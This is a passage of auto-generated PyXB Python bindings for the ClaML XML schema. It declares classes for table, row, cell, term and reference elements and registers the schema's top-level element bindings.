__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_29_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_29_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_29_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_29_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 314, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 314, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Include.name() : __Include,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_29 = CTD_ANON_29
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_30 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 318, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Caption uses Python identifier Caption
__Caption = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Caption'), 'Caption', '__AbsentNamespace0_CTD_ANON_30_Caption', False, pyxb.utils.utility.Location('ClaML.xsd', 328, 4), )
Caption = property(__Caption.value, __Caption.set, None, None)
# Element THead uses Python identifier THead
__THead = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'THead'), 'THead', '__AbsentNamespace0_CTD_ANON_30_THead', False, pyxb.utils.utility.Location('ClaML.xsd', 334, 4), )
THead = property(__THead.value, __THead.set, None, None)
# Element TBody uses Python identifier TBody
__TBody = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TBody'), 'TBody', '__AbsentNamespace0_CTD_ANON_30_TBody', False, pyxb.utils.utility.Location('ClaML.xsd', 342, 4), )
TBody = property(__TBody.value, __TBody.set, None, None)
# Element TFoot uses Python identifier TFoot
__TFoot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), 'TFoot', '__AbsentNamespace0_CTD_ANON_30_TFoot', False, pyxb.utils.utility.Location('ClaML.xsd', 350, 4), )
TFoot = property(__TFoot.value, __TFoot.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_30_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 325, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 325, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Caption.name() : __Caption,
__THead.name() : __THead,
__TBody.name() : __TBody,
__TFoot.name() : __TFoot
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_30 = CTD_ANON_30
# Complex type [anonymous] with content type MIXED
class CTD_ANON_31 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 329, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_31_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_31_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_31_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 331, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 331, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_31 = CTD_ANON_31
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_32 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 335, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_32_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_32_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 339, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 339, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_32 = CTD_ANON_32
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_33 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 343, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_33_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_33_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 347, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 347, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_33 = CTD_ANON_33
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_34 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 351, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_34_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_34_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 355, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 355, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_34 = CTD_ANON_34
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_35 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 359, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Cell uses Python identifier Cell
__Cell = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Cell'), 'Cell', '__AbsentNamespace0_CTD_ANON_35_Cell', True, pyxb.utils.utility.Location('ClaML.xsd', 366, 4), )
Cell = property(__Cell.value, __Cell.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_35_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 363, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 363, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Cell.name() : __Cell
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_35 = CTD_ANON_35
# Complex type [anonymous] with content type MIXED
class CTD_ANON_36 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 367, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_36_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_36_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_36_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element List uses Python identifier List
__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_36_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_36_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_36_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_36_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 375, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 375, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute rowspan uses Python identifier rowspan
__rowspan = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rowspan'), 'rowspan', '__AbsentNamespace0_CTD_ANON_36_rowspan', pyxb.binding.datatypes.anySimpleType)
__rowspan._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 376, 12)
__rowspan._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 376, 12)
rowspan = property(__rowspan.value, __rowspan.set, None, None)
# Attribute colspan uses Python identifier colspan
__colspan = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'colspan'), 'colspan', '__AbsentNamespace0_CTD_ANON_36_colspan', pyxb.binding.datatypes.anySimpleType)
__colspan._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 377, 12)
__colspan._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 377, 12)
colspan = property(__colspan.value, __colspan.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Include.name() : __Include,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class,
__rowspan.name() : __rowspan,
__colspan.name() : __colspan
})
_module_typeBindings.CTD_ANON_36 = CTD_ANON_36
# Complex type [anonymous] with content type MIXED
class CTD_ANON_37 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 381, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_37_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 382, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 382, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_37 = CTD_ANON_37
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_38 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 115, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Display uses Python identifier Display
__Display = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Display'), 'Display', '__AbsentNamespace0_CTD_ANON_38_Display', True, pyxb.utils.utility.Location('ClaML.xsd', 136, 4), )
Display = property(__Display.value, __Display.set, None, None)
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_38_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 119, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 119, 12)
name = property(__name.value, __name.set, None, None)
# Attribute inherited uses Python identifier inherited
__inherited = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'inherited'), 'inherited', '__AbsentNamespace0_CTD_ANON_38_inherited', _module_typeBindings.STD_ANON, unicode_default='true')
__inherited._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 120, 12)
__inherited._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 120, 12)
inherited = property(__inherited.value, __inherited.set, None, None)
_ElementMap.update({
__Display.name() : __Display
})
_AttributeMap.update({
__name.name() : __name,
__inherited.name() : __inherited
})
_module_typeBindings.CTD_ANON_38 = CTD_ANON_38
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_39 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 187, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_39_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element ValidModifierClass uses Python identifier ValidModifierClass
__ValidModifierClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), 'ValidModifierClass', '__AbsentNamespace0_CTD_ANON_39_ValidModifierClass', True, pyxb.utils.utility.Location('ClaML.xsd', 211, 4), )
ValidModifierClass = property(__ValidModifierClass.value, __ValidModifierClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_39_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 192, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 192, 12)
code = property(__code.value, __code.set, None, None)
# Attribute all uses Python identifier all
__all = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'all'), 'all', '__AbsentNamespace0_CTD_ANON_39_all', _module_typeBindings.STD_ANON_, unicode_default='true')
__all._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 193, 12)
__all._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 193, 12)
all = property(__all.value, __all.set, None, None)
# Attribute position uses Python identifier position
__position = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'position'), 'position', '__AbsentNamespace0_CTD_ANON_39_position', pyxb.binding.datatypes.anySimpleType)
__position._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 201, 12)
__position._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 201, 12)
position = property(__position.value, __position.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_39_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 202, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 202, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__ValidModifierClass.name() : __ValidModifierClass
})
_AttributeMap.update({
__code.name() : __code,
__all.name() : __all,
__position.name() : __position,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_39 = CTD_ANON_39
# Complex type [anonymous] with content type MIXED
class CTD_ANON_40 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 271, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_40_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_40_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_40_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 273, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 273, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_40_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 274, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 274, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__AbsentNamespace0_CTD_ANON_40_type', _module_typeBindings.STD_ANON_2, unicode_default='item')
__type._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 275, 12)
__type._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 275, 12)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class,
__usage.name() : __usage,
__type.name() : __type
})
_module_typeBindings.CTD_ANON_40 = CTD_ANON_40
ClaML = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClaML'), CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 23, 4))
Namespace.addCategoryObject('elementBinding', ClaML.name().localName(), ClaML)
Variants = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variants'), CTD_ANON_, location=pyxb.utils.utility.Location('ClaML.xsd', 41, 4))
Namespace.addCategoryObject('elementBinding', Variants.name().localName(), Variants)
Variant = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variant'), CTD_ANON_2, location=pyxb.utils.utility.Location('ClaML.xsd', 48, 4))
Namespace.addCategoryObject('elementBinding', Variant.name().localName(), Variant)
Meta = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4))
Namespace.addCategoryObject('elementBinding', Meta.name().localName(), Meta)
Identifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), CTD_ANON_4, location=pyxb.utils.utility.Location('ClaML.xsd', 60, 4))
Namespace.addCategoryObject('elementBinding', Identifier.name().localName(), Identifier)
Title = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Title'), CTD_ANON_5, location=pyxb.utils.utility.Location('ClaML.xsd', 66, 4))
Namespace.addCategoryObject('elementBinding', Title.name().localName(), Title)
Authors = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Authors'), CTD_ANON_6, location=pyxb.utils.utility.Location('ClaML.xsd', 73, 4))
Namespace.addCategoryObject('elementBinding', Authors.name().localName(), Authors)
Author = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Author'), CTD_ANON_7, location=pyxb.utils.utility.Location('ClaML.xsd', 80, 4))
Namespace.addCategoryObject('elementBinding', Author.name().localName(), Author)
ClassKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), CTD_ANON_8, location=pyxb.utils.utility.Location('ClaML.xsd', 85, 4))
Namespace.addCategoryObject('elementBinding', ClassKinds.name().localName(), ClassKinds)
RubricKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), CTD_ANON_9, location=pyxb.utils.utility.Location('ClaML.xsd', 92, 4))
Namespace.addCategoryObject('elementBinding', RubricKinds.name().localName(), RubricKinds)
UsageKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), CTD_ANON_10, location=pyxb.utils.utility.Location('ClaML.xsd', 99, 4))
Namespace.addCategoryObject('elementBinding', UsageKinds.name().localName(), UsageKinds)
ClassKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), CTD_ANON_11, location=pyxb.utils.utility.Location('ClaML.xsd', 106, 4))
Namespace.addCategoryObject('elementBinding', ClassKind.name().localName(), ClassKind)
UsageKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), CTD_ANON_12, location=pyxb.utils.utility.Location('ClaML.xsd', 130, 4))
Namespace.addCategoryObject('elementBinding', UsageKind.name().localName(), UsageKind)
Display = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4))
Namespace.addCategoryObject('elementBinding', Display.name().localName(), Display)
Modifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 142, 4))
Namespace.addCategoryObject('elementBinding', Modifier.name().localName(), Modifier)
ModifierClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 154, 4))
Namespace.addCategoryObject('elementBinding', ModifierClass.name().localName(), ModifierClass)
Class = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Class'), CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 169, 4))
Namespace.addCategoryObject('elementBinding', Class.name().localName(), Class)
ExcludeModifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), CTD_ANON_17, location=pyxb.utils.utility.Location('ClaML.xsd', 205, 4))
Namespace.addCategoryObject('elementBinding', ExcludeModifier.name().localName(), ExcludeModifier)
ValidModifierClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), CTD_ANON_18, location=pyxb.utils.utility.Location('ClaML.xsd', 211, 4))
Namespace.addCategoryObject('elementBinding', ValidModifierClass.name().localName(), ValidModifierClass)
Rubric = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4))
Namespace.addCategoryObject('elementBinding', Rubric.name().localName(), Rubric)
Label = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Label'), CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 228, 4))
Namespace.addCategoryObject('elementBinding', Label.name().localName(), Label)
History = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4))
Namespace.addCategoryObject('elementBinding', History.name().localName(), History)
SuperClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4))
Namespace.addCategoryObject('elementBinding', SuperClass.name().localName(), SuperClass)
SubClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4))
Namespace.addCategoryObject('elementBinding', SubClass.name().localName(), SubClass)
Reference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4))
Namespace.addCategoryObject('elementBinding', Reference.name().localName(), Reference)
